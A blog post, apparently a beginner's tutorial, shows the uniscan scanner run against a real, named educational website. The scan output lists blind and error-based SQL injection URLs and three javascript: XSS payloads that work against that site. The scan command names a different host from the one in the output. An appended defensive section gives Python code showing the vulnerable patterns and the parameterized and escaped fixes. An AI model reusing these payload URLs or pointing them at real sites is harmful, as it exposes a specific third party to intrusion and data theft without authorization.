Assalamuallaikum wr.wb
I've been using this OS for 7 hours now :D, well, it's not much different from my old Ubuntu, it's just that the tools are more complete *rant over. In this post I want to share how to find website vulnerabilities, for example SQLi and XSS; this time I'm using uniscan. This is just for knowledge, guys, and I'm not a hacker. OK, let's get straight to it
[+] uniscan
that's what it looks like, moving on
[+] uniscan http://sempak.com/ -qweds , I'm just using the default command
and after waiting quite a while, around 2 minutes, it found the goods
| Blind SQL Injection:
| [+] Vul [Blind SQL-i]: http://www.thelaureate.edu.pk/contents.php?id=18+AND+1=1
| [+] Keyword: Temporarily
| [+] Vul [Blind SQL-i]: http://www.thelaureate.edu.pk/contents.php?id=10+AND+1=1
| [+] Keyword: status
| [+] Vul [Blind SQL-i]: http://www.thelaureate.edu.pk/notice-board.php?linkid=8+AND+1=1
| [+] Keyword: Bokhari
|
|
| Local File Include:
|
|
| PHP CGI Argument Injection:
|
|
| Remote Command Execution:
|
|
| Remote File Include:
|
|
| SQL Injection:
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/contents.php?id=16"
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/contents.php?id=8'
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/news-event.php?id=8"
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/news-event.php?id=9'
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/notice-board.php?linkid=13"
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/notice-board.php?linkid=9'
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/notice-board.php?linkid=9"
|
|
| Cross-Site Scripting (XSS):
| [+] Vul [XSS] http://www.thelaureate.edu.pk/notice-board.php?linkid=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
| [+] Vul [XSS] http://www.thelaureate.edu.pk/notice-board.php?linkid=<DIV STYLE="background-image: url(javascript:alert('XSS'))">
| [+] Vul [XSS] http://www.thelaureate.edu.pk/notice-board.php?linkid=<table background="javascript:alert('XSS')"></table>
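The report above flags two patterns: a blind SQLi (the page answers the same whether or not "AND 1=1" is appended to id) together with error-based SQLi (a stray ' or " breaks the query), and reflected XSS in the linkid parameter. Here is an added example, not from the post and not uniscan's code, that recreates both the vulnerable pattern and the fixed version so a developer can see why the scanner fires and what closes it. The content table and the PHP-style handlers are constructed; the real site's code and schema are not on the page, so the string-concatenation and unescaped-echo handlers are an assumption about what would produce these findings. SQLite stands in for the site's database.

```python
import html
import sqlite3


def _build_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the site's content table (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE contents (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO contents VALUES (?, ?)",
        [(10, "Status page"), (16, "Admissions"), (18, "Notice")],
    )
    return conn


CONN = _build_db()


def lookup_vulnerable(id_param: str) -> dict:
    """Concatenates the raw query-string value into SQL (hypothetical contents.php logic).

    '18 AND 1=1' still returns the row while '18 AND 1=2' returns nothing: that
    difference is the blind SQLi signal. A trailing ' or " raises a database
    error, which is the error-based SQLi signal.
    """
    sql = "SELECT title FROM contents WHERE id = " + id_param
    try:
        rows = [row[0] for row in CONN.execute(sql)]
        return {"rows": rows, "error": None}
    except sqlite3.Error as exc:
        return {"rows": [], "error": str(exc)}


def lookup_safe(id_param: str) -> list:
    """Validates the type first, then binds the value as a parameter.

    Anything that is not an integer is rejected before it reaches SQL, and the
    bound value can never change the query structure, so all of the probes in
    the report return an empty result instead of a differing or erroring one.
    """
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    return [row[0] for row in CONN.execute("SELECT title FROM contents WHERE id = ?", (id_value,))]


def probes_differ(lookup) -> bool:
    """Developer self-check for a data-access function: do the two boolean probes
    from the report produce different results? True means the value reaches SQL
    unbound."""
    true_case = lookup("18 AND 1=1")
    false_case = lookup("18 AND 1=2")
    if isinstance(true_case, dict):
        true_case, false_case = true_case["rows"], false_case["rows"]
    return true_case != false_case


def render_notice_vulnerable(linkid: str) -> str:
    """Echoes the parameter straight into HTML (hypothetical notice-board.php logic)."""
    return "<p>No notice found for id " + linkid + "</p>"


def render_notice_safe(linkid: str) -> str:
    """HTML-encodes the parameter (including quotes) before it lands in markup."""
    return "<p>No notice found for id " + html.escape(linkid, quote=True) + "</p>"


if __name__ == "__main__":
    # The XSS payload below is one of the three reported above.
    payload = "<table background=\"javascript:alert('XSS')\"></table>"
    print("vulnerable, 1=1 :", lookup_vulnerable("18 AND 1=1"))
    print("vulnerable, 1=2 :", lookup_vulnerable("18 AND 1=2"))
    print("vulnerable, 8'  :", lookup_vulnerable("8'"))
    print("safe,       1=1 :", lookup_safe("18 AND 1=1"))
    print("probes differ   :", probes_differ(lookup_vulnerable), probes_differ(lookup_safe))
    print("safe render     :", render_notice_safe(payload))
```

Running the block shows the vulnerable lookup answering differently to the 1=1 and 1=2 probes and throwing a syntax error on 8', while the parameterized lookup gives the same empty answer to all of them; the escaped render turns the reported table payload into inert text. In PHP the equivalent fixes are an int cast or filter_var() plus a prepared statement, and htmlspecialchars() with ENT_QUOTES on output.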
that's all from me, hopefully it's useful ^_^ ~